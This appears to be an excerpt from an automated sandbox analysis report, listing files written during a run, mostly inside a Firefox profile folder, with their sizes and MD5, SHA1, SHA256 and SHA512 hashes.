SHA256a4ef2b3219c2f6c1015406cfd456417ab36f53058f2e59187bcf2af29439f929
SHA512f11b68b6a405601645236f24b59898d3f401afa030358b5b7254c4e553f20b2fb5ad2afd4d27f980434f7ed23d7b7dfc1c098dd4a50bb8181ddc3304e920dd57
-
Filesize
2.1MB
MD5b40c53fd6ebb8ac610e3762962964dd9
SHA15d21fbebbc5e95a55b7cd667ea88a75d48f312fe
SHA256e94df768368954afdc8837b0a7fd8764ad826dfac14b9af4df183cfd78201980
SHA512545e7d8679765c77689a7f7f0e8d2aa032c54edeed0cba01fbeba154aa6167f0cfd604a4f5e404936035c0c99d31aee76c42d4900aa1191cc29e9335eb5b5ea9
-
Filesize
1.7MB
MD54c265993ba0bccec886a5bde97daef83
SHA1c85ca0619dac8b5fff735fb069ebebd85a156a54
SHA25697ee6251a4c5471cf4018fc89b44cae101c40950ef8c1010c7376da805d3673b
SHA512f5fb4fa2705b9031e86700c1c2151bc770191ac7a51456adc4673ce776e4ac63ee247c03710f903352611e7df74f655427a6eb69c901f1dafb76ea2e0dd5ed0f
-
Filesize
3.8MB
MD517f13fc530bc52f8d837689a67b8962a
SHA1e332280450bb598dd077c17a83165ef5e1521614
SHA256ed48b6b1dea8a414989055de0987c9dff063e456b2fab2d06b48f1fe0a660b10
SHA51259d7153ee618bc965fc51ff8ef74f33c246bc503243b4c52a42bded2ab0ddd9fdac6cbfa6babe5330bff2d29252ef6f3fe575f63a69b6080b258cc20ebce7f71
-
Filesize
2.0MB
MD543f71f2a16b258ba3be34d837c0f43ca
SHA110f08b185515267fd1d5d90a395d7fdfc598e9b9
SHA256783dbbb3db6748a2f20364ca4a7803893432316933e7cb1af059bc225e1b4d23
SHA512057c62d80b22ce9e3c15c5076cb1d21c06f55710a95ef8a4bae3ae2a12fdadab78ef9e85fe78ede794e4232102b28c1e2834eb9d5e3428082d6e29eb99e48828
-
Filesize
2.0MB
MD54bf1ceb25a2893275cbdbd4026e51b28
SHA1fe60d4df8f1f6b682ccae4df0d48d1662c8aa8e1
SHA2562063f2c03a2d00224f42942762a5535ce767cd722b5e93cbae5c55cc9c92e255
SHA512de068b35bc94bf8c7a057fe3fa579cccb98cd69b63586604dc1aacc6f6bcb558904703a0e036f2094ea93e885c8334bd33a8571a6343ebb5ad702ccd22c45984
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.3MB
MD55da2a50fa3583efa1026acd7cbd3171a
SHA1cb0dab475655882458c76ed85f9e87f26e0a9112
SHA2562c7b5e41c73a755d34f1b43b958541fc5e633ac3fc6f017478242054b7fe363a
SHA51238ed7d8c728b3abaa5347d7a90206f86cc44cf2512dae9d55a8a71601717665ece7428cbecb929a1c79a63cc078c495c632791d869cc5169d101554c221ddae7
-
Filesize
3.6MB
MD58f0ac7253f77aa16992f71633fd14a81
SHA11d52e3fbcdeb0f224cf2d3f0713803dc31486ee2
SHA256fe3b34e1b42d481a880f114fc6abdb6bf7bf19020f3d41bf1125ae6deb69bcf6
SHA512426a1c0c4e4a8f4c4040af099563c369230a25325383c2a62bbe5b8598e580d05d71b29684ffce954d17c93049226ac64f077b349e12372b1815ecef1bbd3bdc
-
Filesize
717B
MD50ea45f0073a95b498a872af42568e1e7
SHA17c6fb88a483b484b773e8df3213f319081a4a361
SHA2565013581a48395c39c2755c9d1232628c0164b00365bf897e5d71e546f541199e
SHA512ede56a61c67e49c6c901691ad8160b3ce24ee3221d2c1e4ade431e53266d88a1f2aaa6d3c487f6b9d739370c453eb14bc8a1beec7c8dbd0091ca296a88654a35
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD53db950b4014a955d2142621aaeecd826
SHA1c2b728b05bc34b43d82379ac4ce6bdae77d27c51
SHA256567f5df81ea0c9bdcfb7221f0ea091893150f8c16e3012e4f0314ba3d43f1632
SHA51203105dcf804e4713b6ed7c281ad0343ac6d6eb2aed57a897c6a09515a8c7f3e06b344563e224365dc9159cfd8ed3ef665d6aec18cc07aaad66eed0dc4957dde3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\AlternateServices.bin
Filesize10KB
MD5baa092b067493405b7163393d19dfc5d
SHA17b5d8ba30a1c9db34e1c0374a93343943f218322
SHA25689cf8736f71c029820a917a9904676016c9002e4ae4422a30cfd43456e097c61
SHA51285b7457695689eba7c8fc18f7bc3436e5dc53f5d6f393c4e6c7bcd26238d8ac1f13b9d6493096ad56deb7374630d058da0f705a7daa98d199b740fa1e6545928
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\datareporting\glean\db\data.safe.bin
Filesize29KB
MD5b26f1d15177111f12445fc6e5dcd2a67
SHA1fda200ca8ab09ebdd229701bebc6214b99ba67a2
SHA25626b30dd2a765cb863da7eb7b1ffbb20c2bba39834f634cc5122688a71085b701
SHA512f77a0c09c31552a0fff39a6f3f3969a4ce754662b1f6c5aa4580026e4e8501bea4f8790921d716c380c2721f8ebef4822bd757e85a7966429f08b853cd6f771b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\datareporting\glean\db\data.safe.tmp
Filesize30KB
MD57b55eb7c81ab884aede382e301f1102f
SHA1063d01dfd2014a906c44ddd6e8f074c6b182d9c9
SHA256c2ffa81889231a22ec11609b4c265d16f7c137f5ebe123eb4556b84c7ae43079
SHA51239a6ee1218f235e177c4ed4bbd1f44390131a2de9dff3c4013affc052bf16970ff08ba606a8c2096149b261c4cc1ffe58fac2463da8b86100885a8c8bc59773b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\datareporting\glean\db\data.safe.tmp
Filesize29KB
MD5065fa81b404c785490a0593ef7308f14
SHA176fa4fd98cb87902ea0f46bc98d7061dc72c923a
SHA256bbebe8d3665f77e94e3fecdf4cc51c5fd88952ae07625778159020d3da02fb0c
SHA512704de2a9d7fa02683822f9203c6af4540e19e6c0419a179a14ed130d7237c035a6f201225adf0702ae75fb0e008780a46e67f50322f1abea345d2a884c325754
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD592d49595d0c66c9eb0a80c6b35d2621b
SHA17fecfb468216f74a3f0f2461ddd7996c242d8aba
SHA256bbab084e11d2e31e8bf6f0db6d26224143d74ad66742c721777a9ab6d3e48c87
SHA51200afe6121d94a07c4bd574371a205a34d285ee64d8421f0e2c6241bea27f264b83ea1b958d2edcc2d0cb6df92ac9a9b5f6cf4c702a6b4a75943d3c0219018573
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\datareporting\glean\events\events
Filesize1KB
MD5056f96e81024d3af980ec2328636565f
SHA10ec462f6481b03d5b3be8275221fab0ec8f774b6
SHA2564a7b817625a521ec7fd5cb6a587d040cc5babfd8bcd78d3178c16b8c223011e3
SHA5123a6de63f3ac6ad979adc988411c56822c6f898e40ba1c62ddf25f86e5375b9f036898d97e1970decde282be4d81a0b6f456ea8bf18da6dfe23be94adc18a8a35
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\datareporting\glean\pending_pings\0464946a-15cd-460c-815e-2baf1db4bff4
Filesize883B
MD505afc5b3e6bc834c94b837f6d3b1981e
SHA196af3fa4d64dc8a856681a1ac530c43d068367ea
SHA2568b0f0d50ca5634c1d0e03575a292dce411e8387dd81fce26d0cf148fbf8e5175
SHA5128684cc7e20ab377156be18a6afb21a9ef1cbdbfc231b37c845685dd37a1c1b63a69a9d6fb5849a255caa632a80070b07244aa62bbb8989c044a1bab4cd9568bf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\datareporting\glean\pending_pings\39ac6944-bd4c-4f9b-a977-d808741c0f46
Filesize2KB
MD54c61e116a8dfad999b03cba41975dd99
SHA13d4dbabd83190263bd74c4426d67fc3868ace4fc
SHA2569b44704065fc165e13c94c4531381657ce4e672ca3f6dfa72af99061ff62ae22
SHA51241ff52ed3a6b6f89a8b5c59f372a4734d29298590c515a315226e3d58797c6b01226525e3f819052ce85fa6915160a60ee1cff019cd91fab1249f034e08813e5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\datareporting\glean\pending_pings\6cd59a9b-0f5b-4fc4-ac86-e02123e1a8e7
Filesize235B
MD504001f618be4003af766a8f5d68ff456
SHA1d47d9c65f29f254262ce263f1f7c77c4e75eba57
SHA2564c3a59eefc00b05f3530c344f3da8314cdc243bb35193029657432278262f587
SHA5126230fc0f87e7f765475243db7e2c7f1547bc0fcc8839cf5c3f181c2c75cc10db47d720fe11be267d44898e47d9e2b738af650d3052087c9c512918049de99692
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\datareporting\glean\pending_pings\7cda22a6-d64a-4c71-ba00-eedc7c085d8b
Filesize235B
MD5624d765e48747c53d5bc0e452c080578
SHA1c42896bd6c58b74e148c207a6d39e263492f4548
SHA256b333437d88891fd54c79d69dacb86f54b472cbe9f16257cf071ea8f774a742b5
SHA512ab4a0ef666eac4fe23d374f08198f490a468a76e43d19414d00043082960476137375ac6f01199cd768967ec9bfefb0a939547dc6902267ff3dfacd8ed52e589
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\datareporting\glean\pending_pings\b6892a89-a2de-4faf-a755-a61f1b4aa805
Filesize16KB
MD591f10dfe06eef5d97985fbde9d28ea94
SHA18c09b2fb7ce0d4a6a631cce6798625c901c38a81
SHA25661c7f4d6f71b7cb4c5c25d940cc54cda556c4eea191b229728f3ee8fc8cf8269
SHA512b3fd598cd3419fbea2ac4283bb6203f04f50837811e91e820a22d29dbb93f09b4481a4de669be3c665077f287542ca3b7606d246ddf5b96b51cc174929ecb0fc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\datareporting\glean\pending_pings\f63a7c56-b882-4e95-a1a3-1a047f163c76
Filesize886B
MD523a5ec686a3ee1ee99062e88a7d2c1e8
SHA145db8362b850dad58fa98bf6514e2cc5c9de343f
SHA2567a001f5e235543ce77ae26c2bb367c5e6a19bdb3a349dcbc963ce14c0ea25a80
SHA5129433908542600fbeee767a359f9c7f566ffb3f72725383ba91ab87e336f41a040f71291db36918c11121fb508aeaab67e06060902aa0b0c1ee6ea17d9c522e6d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\gmp-widevinecdm\4.10.2830.0\manifest.json
Filesize1001B
MD52ff237adbc218a4934a8b361bcd3428e
SHA1efad279269d9372dcf9c65b8527792e2e9e6ca7d
SHA25625a702dd5389cc7b077c6b4e06c1fad9bdea74a9c37453388986d093c277d827
SHA512bafd91699019ab756adf13633b825d9d9bae374ca146e8c05abc70c931d491d421268a6e6549a8d284782898bc6eb99e3017fbe3a98e09cd3dfecad19f95e542
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\gmp-widevinecdm\4.10.2830.0\widevinecdm.dll
Filesize18.3MB
MD59d76604a452d6fdad3cdad64dbdd68a1
SHA1dc7e98ad3cf8d7be84f6b3074158b7196356675b
SHA256eb98fa2cfe142976b33fc3e15cf38a391f079e01cf61a82577b15107a98dea02
SHA512edd0c26c0b1323344eb89f315876e9deb460817fc7c52faedadad34732797dad0d73906f63f832e7c877a37db4b2907c071748edfad81ea4009685385e9e9137
-
Filesize
6KB
MD5873a943035b7473c5ec61a37e72449da
SHA1570547d6210e98038833692e1b5bf13ea0502115
SHA2567fd4a947edebf536b97f651a7ed37af0ce092fc51d233f4caecdf1cbb5557911
SHA5128ee14414f28a7481daf016bae7b61a6bad656e47e80ac18d01d5e2a0535bf8b9405a412500678d31790fd9fe3e03168a0dea0bca2a40d2b85c5e4c89d612b117
-
Filesize
8KB
MD542d0c1b239a2b041ba975a2717229f87
SHA137ae4d7664e30a815b18bafb60db95c09fc69de0
SHA2566fac0edcef004c9116f99c0e9577c7a754a90c5dd90545024f8528f83e831baf
SHA51271aba5d5e6e39e183ef7dc13b8548741dca0b5497b286124f974c1d6dce2a41076d92a6f813671e68b6178dbb23d7806ef28b189fb43e555440987b16b52f7c3
-
Filesize
11KB
MD5525801f9b19d6743d3b72457a22d40c4
SHA14ec5781ea7e738b344f008bf09315efd1eba5f5b
SHA256af488548a3e5cc36437832af91f1f538aa265928ac035fe0ae8795c70e1f7f5a
SHA512c41d11dc3351284d12002f7407f8d001224807192ab63c1692e4162264bbd84ff26798cbb871a5fe23365f6be426b9da2203becbb3bfc52399f2d36988b881cf
-
Filesize
6KB
MD53795114062c6528f64377d25ab7e9d50
SHA189204bdd591f5d5cb6234b46aef3fa7d502f0812
SHA256e2632fef9b87ee863b0fb2557fb580789a542f6f3ca6383b8a1ae02daff38e15
SHA512b5017db5891fbb542861a64f2ec1415f2f6238fa71f901b706f7e47203653351500d987671e009dea995ea7d5c195adafe86fbe3cc34442a46fe897dec7fa6b7
-
Filesize
6KB
MD595ae12b7ff5bf217aab15aa16d42086a
SHA1f5db5cb6a86e1bd1f06fac8ad9ee7871517ec78b
SHA256afcd7273023edc19a89b49756a9c2858129ad8e2c9c7de2875aef43792517b29
SHA5122b140307cf6b2729d3428d869abb8d7053ebff94cd55dce19fb6ef062e347f52ea4e9c1cd157f54e4fc8a1dd264d4e55ed0152f334ffbd1b59c8120ab7692e61
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\sessionstore-backups\recovery.jsonlz4
Filesize1KB
MD57ab1422cb05333934e6c6210572c8ea8
SHA1ad17fb2f51680984f63b8db82faf37eefa98e6cb
SHA25606ba3954ee042711d3d6567b7a9b493544ede4eca0835558887a1ff7d67c758c
SHA51260c42469683c0e7538f0b569a356739451e76207fcb46acfc17352a7ad7d3921606b7270b7eff7f71255ead0530b4606ca606e17421b215c3e75614c59540bac
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize7.0MB
MD5989f46d46e23a09160d2b37ef657669e
SHA1afc4cf363598093e131025dc9ec504d0c370fc6f
SHA2566ec64eb293acd16257cbcdde35aec7b762371d163c799f33d8cbfa765797e74b
SHA5124c01ef324db1e9a3753c5be131b0cd06459282f7f7adce2ab111be2b2d6e0a96f2fcd4c165c57024ddbacc55b3c84e26745f332a11448db762821d5598a9b970
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize10.5MB
MD5fd94a217fddee88c66f4889e64e701e7
SHA1077ecbe0a88ad545fd92e72e00015ee2c90dbb5e
SHA25676eed344dbe57b65b4c5433a400a147a29635080da63d0248e01ae8a8485ee9c
SHA51266bd68b58655050a43629e52867ce1e4cad4f2b9b65588d5593bb377f286d251ad6731b14363fac42ac914979fade4a2b166b8a2916ef9fd4e2f58529f7a94c0